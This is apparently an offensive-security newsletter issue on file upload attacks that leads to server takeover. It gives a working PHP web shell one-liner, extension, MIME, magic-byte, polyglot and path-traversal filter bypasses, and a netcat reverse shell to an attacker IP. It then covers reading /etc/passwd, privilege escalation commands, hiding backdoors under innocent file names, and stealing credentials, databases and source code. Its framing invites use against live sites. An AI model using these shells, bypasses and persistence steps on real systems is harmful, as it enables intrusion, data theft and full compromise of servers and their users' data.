
Break the Web (Week 6): File Uploads & Remote Code Execution

File Upload Exploitation: Step-by-Step Tutorial with Web Shells, Filter Bypasses, Polyglot Files & Server Takeover

🎯 Week 6: File Uploads & Remote Code Execution

Break the Web: Part 6 of 8

Welcome back to Offensive Tuesday.

Hey 👋

Last week you hijacked browsers with XSS. You stole cookies, captured keystrokes, and hooked victims with BeEF. If you missed it, catch up here 👉 week 5

This week? We're uploading shells and taking over servers.

Here's what most people don't understand — file upload features are remote code execution waiting to happen.

Profile picture upload? Web shell.
Resume submission? Backdoor.
"Secure" document manager? Full server access.

The Equifax breach started with file upload. Countless ransomware attacks used it as the entry point. Bug bounty hunters find these weekly and collect $10K+ payouts.

Today you're learning how to turn upload forms into server takeovers.


🧠 What is File Upload RCE?

Remote Code Execution through file uploads happens when you upload a malicious file that the server executes as code.

Here's the attack chain:

  1. Find a file upload feature (profile pic, document upload, avatar)

  2. Upload a web shell disguised as a legitimate file

  3. Server stores your file without proper validation

  4. You access your uploaded file via URL

  5. Server executes your code instead of serving a static file

  6. You now have command execution on their server

The key difference from other attacks: You're not exploiting a bug in the code. You're abusing a feature working exactly as designed.

The website literally invited you to put files on their server. You just gave them the wrong kind of file.

💣 Why This Works

Most developers think like this:

"We'll only allow image uploads. Just check the file extension. That's secure, right?"

Wrong.

Here's what they miss:

❌ File extensions can be spoofed — shell.php disguised as shell.jpg
❌ MIME types can be faked — Send "image/jpeg" header with PHP code
❌ Double extensions work — shell.php.jpg gets executed as PHP
❌ Null bytes bypass filters — shell.php%00.jpg (server reads .php, stops at null)
❌ Case sensitivity matters — shell.PhP when filter only blocks .php
❌ Alternative extensions exist — .php5, .phtml, .phar, .phps all execute
❌ Image files can contain code — Polyglot files are valid images AND valid PHP

The server stores your file. Then someone (you) requests it. Server sees .php and executes it. Game over.

🎯 The Attack Process

Step 1: Find Upload Points

Look everywhere users can upload files:

✅ Profile pictures / avatars
✅ Document uploads (resumes, PDFs)
✅ Image galleries
✅ File sharing features
✅ Import functionality (CSV, XML, JSON)
✅ Logo uploads
✅ Cover photos
✅ Attachment features
✅ Theme/plugin uploads (WordPress, CMS)
✅ Backup restore functions
✅ Configuration file uploads
✅ Invoice/receipt uploads
✅ ID verification uploads

Your mantra: If it accepts files, test it.

Pro tip: Admin panels and internal tools have weaker security. They assume "only trusted users will access this." That's your way in.

Step 2: Understand What You're Attacking

Before uploading, figure out the server environment:

Check the tech stack:

  • PHP server? Upload .php shells

  • ASP.NET? Upload .aspx shells

  • Java/JSP? Upload .jsp shells

  • Python? Upload .py shells

  • Node.js? Upload .js shells

How to detect:

  • Check HTTP headers (X-Powered-By, Server)

  • Look at existing file extensions on the site

  • Check error messages

  • Use Wappalyzer browser extension — Get it here

  • Run whatweb tool — Install here

Find where uploads are stored:

  • Try accessing /uploads/, /files/, /media/, /content/, /assets/

  • Check HTML source for image paths

  • Upload a legitimate file, note the URL

  • That's where your shell will live

Step 3: Create Your Weapon

Start with a simple test payload to prove execution:

<?php system($_GET['cmd']); ?>

Save as shell.php. Upload it. Access it with ?cmd=whoami and you'll see command output.

That's it. That's remote code execution.

For real attacks, you want full-featured shells that give you file management, database access, and persistence. Grab battle-tested ones instead of writing your own:

🔥 Web Shell Collections:

For different server languages:

Pro tip: Start with the simple one-liner above. Prove execution. Then upgrade to feature-rich shells for persistence and lateral movement.

Step 4: Bypass Upload Filters

Sites try to block malicious uploads. Here's how to get around them:

🔓 Extension Bypasses:

If .php is blocked, try:

  • .php3, .php4, .php5, .php7, .phtml, .phar, .phps

  • .PhP, .pHp (case variation)

  • .php.jpg (double extension)

  • .jpg.php (reverse double)

  • .php%00.jpg (null byte injection)

  • .php%20 (trailing space)

  • .php:: (NTFS alternate data streams on Windows)

  • .php/. (trailing dot/slash)

🔓 MIME Type Bypasses:

Server checks Content-Type header? Fake it:

  • Upload your shell.php

  • Intercept with Burp Suite

  • Change Content-Type to "image/jpeg"

  • Server thinks it's an image, stores it anyway

🔓 Magic Bytes (File Signature) Bypasses:

Server checks the file's first bytes? Add image headers:

Prepend these magic bytes to your PHP shell:

  • JPEG: FF D8 FF E0

  • PNG: 89 50 4E 47

  • GIF: 47 49 46 38

Now your file looks like a valid image to automated checkers, but still executes as PHP.

🔓 Polyglot Files:

Create files that are BOTH valid images AND valid code:

Tools:

These pass ALL image validation checks and still execute.

🔓 Path Traversal in Filename:

Control where your file gets saved:

  • Filename: ../../../shell.php

  • Might escape the uploads folder and land in web root

  • Now accessible at https://site.com/shell.php
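As an added example (not code from the newsletter), here is the extension-only filter described in "Why This Works" next to a validator that rejects every bypass listed there and in Step 4; the filenames, byte strings and the set of allowed image types are constructed assumptions.

```python
# Added example, not the newsletter's code: the "just check the extension"
# filter the text describes, next to a validator that rejects each listed
# bypass. Sample names and bytes are constructed.
from urllib.parse import unquote

IMAGE_MAGIC = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
SCRIPT_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}


def naive_check(filename):
    """Extension-only filter: looks at whatever follows the last dot."""
    return filename.rsplit(".", 1)[-1].lower() in IMAGE_MAGIC


def strict_check(filename, content):
    """Reject the listed bypasses instead of trusting the name:
    decoded null bytes and trailing spaces, path separators (traversal),
    more than one extension, script extensions in any case, a body whose
    magic bytes do not match the one allowed extension, and interpreter
    open tags hidden behind a valid image header (polyglot)."""
    name = unquote(filename)  # %00 becomes a real NUL, %20 a space
    if "\x00" in name or "/" in name or "\\" in name or name != name.strip():
        return False
    parts = name.lower().split(".")  # exactly "<base>.<ext>", nothing else
    if len(parts) != 2 or not parts[0] or parts[1] in SCRIPT_EXT:
        return False
    magic = IMAGE_MAGIC.get(parts[1])
    if magic is None or not content.startswith(magic):
        return False
    body = content.lower()  # a prepended JPEG/PNG header does not neutralise code
    return not any(tag in body for tag in (b"<?php", b"<?=", b"<%"))
```

Name and byte checks are one layer only; the upload directory still has to be served without script execution, which no filename check can substitute for.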

Step 5: Upload and Access

Upload your weaponized file:

  1. Choose your payload based on what works (extension, MIME, polyglot)

  2. Upload through the form

  3. Note the success message or URL

  4. Find where it's stored (usually shown after upload or in your profile)

Access your shell:

Navigate to: https://target.com/uploads/shell.php

If you see your web shell interface or command output, you're in.

Execute commands:

Depending on your shell:

  • ?cmd=whoami — Check what user you're running as

  • ?cmd=id — Get user ID and groups

  • ?cmd=ls -la — List files

  • ?cmd=cat /etc/passwd — Read sensitive files

  • ?cmd=nc -e /bin/bash attacker-ip 4444 — Reverse shell

Pro tip: Don't go crazy immediately. First, understand the environment. Check privileges, operating system, installed software. Then escalate.
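From the defender's side, an added example (not from the newsletter) of how the requests in this step look in a web server access log and how to flag them; the log lines are constructed, and the upload directories and parameter names are assumptions.

```python
# Added example, not from the newsletter: flagging web-shell use in server
# access logs. Log lines are constructed samples in Apache combined format;
# the upload directories and parameter names are assumptions.
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
UPLOAD_DIRS = ("/uploads/", "/files/", "/media/")
# script extension followed by end of path, a dot, a slash or an encoded null byte
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar|phps|aspx?|jsp)(\.|/|%00|$)", re.I)
CMD_PARAMS = {"cmd", "c", "exec", "command"}
SHELL_WORDS = ("whoami", "/etc/passwd", "/bin/sh", "/bin/bash", "nc ", "curl ", "wget ")

SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2025:12:00:01 +0000] "POST /profile/avatar HTTP/1.1" 200 512
203.0.113.7 - - [10/Jun/2025:12:00:05 +0000] "GET /uploads/avatar_42.jpg HTTP/1.1" 200 8211
203.0.113.7 - - [10/Jun/2025:12:00:09 +0000] "GET /uploads/shell.php?cmd=whoami HTTP/1.1" 200 34
203.0.113.7 - - [10/Jun/2025:12:00:20 +0000] "GET /uploads/shell.php%00.jpg?cmd=cat%20/etc/passwd HTTP/1.1" 200 2048
198.51.100.9 - - [10/Jun/2025:12:01:00 +0000] "GET /uploads/report.pdf HTTP/1.1" 200 90210
"""


def flag_shell_requests(log_text):
    """Return (client_ip, path, status, reasons) for each request that looks
    like a script being executed out of an upload directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.startswith(UPLOAD_DIRS):
            continue  # only static content is expected under these paths
        reasons = []
        if EXEC_EXT.search(url.path):
            reasons.append("script extension under upload directory")
        query = parse_qs(url.query)  # decodes %20 etc. in parameter values
        if CMD_PARAMS.intersection(query):
            reasons.append("command parameter in query")
        values = " ".join(v for vals in query.values() for v in vals)
        if any(word in values for word in SHELL_WORDS):
            reasons.append("shell command in query")
        if reasons:
            hits.append((ip, url.path, status, tuple(reasons)))
    return hits
```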

Step 6: Establish Persistence

You have code execution. Now maintain access:

Upload a better shell:

  • Use your basic shell to upload more tools

  • Deploy full-featured web shells (C99, R57, B374K)

  • Create multiple backdoors in different locations

  • Rename them to look innocent (config.php, footer.php)

Create a reverse shell:

  • Listen on your machine: nc -lvnp 4444

  • Execute from web shell: Reverse shell command

  • Get interactive terminal access

  • Full references: Reverse Shell Cheat Sheet

Privilege escalation:

  • Check for sudo misconfigurations: sudo -l

  • Look for SUID binaries: find / -perm -4000 2>/dev/null

  • Check kernel version for exploits

  • Full guide: GTFOBins and LinPEAS

Steal everything valuable:

  • Database credentials (config files, .env files)

  • API keys and secrets

  • User data

  • Source code

  • Other server credentials

🎯 Real-World File Upload Hunting

Where file upload RCE hides in 2025:

πŸ” CMS platforms β€” WordPress, Joomla, Drupal plugin uploads
πŸ” HR portals β€” Resume upload features
πŸ” Social platforms β€” Profile pictures, cover photos
πŸ” E-commerce β€” Product image uploads (vendor panels)
πŸ” File sharing apps β€” "Secure" document managers
πŸ” Support ticketing β€” Attachment uploads
πŸ” Learning management systems β€” Assignment submissions
πŸ” Real estate sites β€” Property image uploads
πŸ” Job boards β€” CV/resume uploads
πŸ” Healthcare portals β€” Medical record uploads
πŸ” Admin panels β€” Logo/theme customization
πŸ” API endpoints β€” /api/upload, /api/files

Bug bounty pro tip: Look for upload features in newly launched sections. Developers rush to ship, security gets skipped. Check changelogs and release notes, then hunt those endpoints first.

πŸ›‘οΈ Why This is Devastating

Here's why file upload RCE is critical severity:

Full server compromise:
✅ Execute arbitrary commands
✅ Read any file on the system
✅ Modify application code
✅ Install malware/ransomware
✅ Pivot to internal network
✅ Steal all databases
✅ Create admin accounts
✅ Deface the website
✅ Use server for crypto mining
✅ Launch attacks on other systems

It bypasses everything:
❌ WAF can't detect it (file upload is legitimate traffic)
❌ Antivirus might miss it (if you obfuscate)
❌ File integrity monitoring? Only if they're checking uploads
❌ Network security? You're attacking via HTTPS
❌ Authentication? Doesn't matter, shell is publicly accessible

Once you upload a working shell, you own that server. Everything else is just cleanup.
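An added example, not the newsletter's code: the file integrity monitoring that Step 6's renamed shells and the note above assume is absent, scoped so that the uploads directory is covered; the web root, file names and file contents are constructed.

```python
# Added example, not from the newsletter: a minimal file-integrity check over a
# web root that includes the uploads directory, so renamed shells (config.php,
# footer.php) and polyglot images are in scope. Paths and contents are constructed.
import hashlib
import os
import tempfile

SCRIPT_EXT = (".php", ".php3", ".php5", ".php7", ".phtml", ".phar", ".jsp", ".aspx")
OPEN_TAGS = (b"<?php", b"<?=", b"<%")


def snapshot(root):
    """Map each file (relative to root) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def looks_like_script(path):
    """Script extension, or an interpreter open tag in the first 4 KiB
    (a PHP payload behind JPEG/PNG magic bytes still carries one)."""
    if path.lower().endswith(SCRIPT_EXT):
        return True
    with open(path, "rb") as fh:
        head = fh.read(4096).lower()
    return any(tag in head for tag in OPEN_TAGS)


def find_changes(root, baseline):
    """Sorted (relpath, 'new'|'modified', is_script) for every file whose
    hash is missing from, or differs from, the baseline taken by snapshot()."""
    findings = []
    for rel, digest in snapshot(root).items():
        if baseline.get(rel) != digest:
            kind = "modified" if rel in baseline else "new"
            findings.append((rel, kind, looks_like_script(os.path.join(root, rel))))
    return sorted(findings)


def put(root, rel, data):  # write one constructed file below root
    os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
    with open(os.path.join(root, rel), "wb") as fh:
        fh.write(data)


def demo():
    """Constructed web root: take a baseline, then two files appear under uploads/."""
    root = tempfile.mkdtemp()
    put(root, "index.php", b"<?php echo 'site'; ?>")
    put(root, "uploads/avatar.jpg", b"\xff\xd8\xff\xe0 constructed jpeg bytes")
    baseline = snapshot(root)
    put(root, "uploads/footer.php", b"<?php /* constructed stand-in for a renamed shell */ ?>")
    put(root, "uploads/logo.png", b"\x89PNG\r\n\x1a\n<?php /* constructed polyglot */ ?>")
    return find_changes(root, baseline)
```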

πŸ› οΈ Essential File Upload Tools

Scanning & Detection:

  • Burp Suite — Intercept uploads, modify requests, test bypasses — Download

  • OWASP ZAP — Free alternative to Burp — Download

  • Upload Scanner — Burp extension for automated file upload testing — Get it

  • Fuxploider — Automated file upload vulnerability scanner — Install here

Web Shells & Payloads:

  • Weevely — Encrypted PHP shell generator — Get it

  • SecLists — Web shell collection (PHP, ASP, JSP) — Browse here

  • PayloadsAllTheThings — File upload payloads and bypasses — Check here

  • Metasploit — Includes web delivery and shell generation — Official site

File Manipulation:

  • exiftool — Add/modify image metadata for polyglots — Download

  • HxD — Hex editor for adding magic bytes — Get it

  • ImageMagick — Image processing (sometimes exploitable itself) — Install

📚 Learning Resources

Deep Dives:

  • OWASP File Upload Guide — Complete security reference — Read here

  • HackTricks File Upload — Comprehensive attack techniques — Study here

  • PayloadsAllTheThings — All bypass methods documented — Browse here

  • HackerOne Disclosed Reports — Real file upload RCE bounties — Browse here

That's Week 6. 🚀

Tomorrow (Wednesday): How to secure file uploads and prevent remote code execution.

Next Tuesday (Week 7): SSRF & Internal Access β€” we're making servers attack themselves and accessing internal networks.

See you then.


P.S. Got questions? Reply to this email. I read everything.
